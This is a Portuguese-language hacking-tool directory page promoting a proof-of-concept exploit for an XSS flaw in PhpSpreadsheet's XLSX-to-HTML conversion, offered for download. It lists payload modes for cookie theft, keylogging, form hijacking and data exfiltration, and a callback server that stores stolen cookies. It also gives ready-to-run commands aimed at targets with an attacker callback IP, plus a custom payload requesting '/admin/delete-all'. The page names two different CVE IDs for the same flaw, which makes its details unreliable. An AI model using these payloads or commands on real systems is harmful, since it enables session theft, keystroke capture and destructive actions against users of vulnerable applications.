Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/roj1py/cve-2024-47875-phpspreadsheet-xss-poc
Ferramentas de PhishingGeração de PayloadsExploraçãoExploração de Aplicações WebExfiltração de DadosComando e Controle
GitHubroj1py/cve-2024-47875-phpspreadsheet-xss-poc

CVE-2024-47875-PhpSpreadsheet-XSS-PoC

Este é um PoC/Exploit para a CVE-2024-47875, uma vulnerabilidade de XSS no PhpSpreadsheet.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
1há 11 mesesAinda não revisado

CVE-2025-22131 • PhpSpreadsheet HTML Writer XSS (PoC)

Visão Geral

Este é um PoC da CVE-2025-22131, uma vulnerabilidade de Cross-Site Scripting (XSS) no PhpSpreadsheet em versões anteriores a 2.2.2, 2.1.2 e 1.29.4. A vulnerabilidade reside na função generateNavigation(), que não sanitiza os nomes das planilhas durante a conversão de XLSX para HTML, permitindo a injeção de JavaScript malicioso.

CVE ID: CVE-2024-47875

Aviso do GitHub: GHSA-79xx-vf93-p7cx

Versões afetadas: PhpSpreadsheet < 2.2.2, < 2.1.2, < 1.29.4

Autor: Roj

Licença: MIT

Repositório: Repositório do PoC


Funcionalidades

📄 Gera arquivos XLSX maliciosos com payloads XSS personalizáveis

🛠️ Suporta vários tipos de payload:

cookie_theft: Rouba cookies de sessão

redirect: Redireciona usuários para um site controlado pelo atacante

alert: Exibe um alerta de teste para PoC

keylogger: Captura teclas digitadas

form_hijack: Intercepta envios de formulários

data_exfil: Exfiltra dados de um endpoint especificado

🌐 Servidor HTTP integrado para capturar callbacks do exploit

⬆️ Envia arquivos XLSX maliciosos para um endpoint alvo

💾 Salva dados capturados (ex.: cookies) em um arquivo JSON

🎨 Saída de terminal colorida para melhor legibilidade

🔍 Log detalhado para depuração


Uso

root@kitploit:~
python exploit.py -h

🚀 Exemplos de uso:

root@kitploit:~
#Basic cookie theft attack
python3 exploit.py http://target.htb 10.10.16.50

# Custom upload endpoint
python3 exploit.py http://app.htb 10.10.16.50 -e /api/file-upload

# Different payload types
python3 exploit.py http://target.com 10.10.16.50 -p keylogger
python3 exploit.py http://target.com 10.10.16.50 -p redirect
python3 exploit.py http://target.com 10.10.16.50 -p form_hijack

# Custom XSS payload
python3 exploit.py http://target.com 10.10.16.50 --custom "<script>fetch('/admin/delete-all')</script>"

Desejo receber feedbacks e boa sorte a todos.

Baixar ferramenta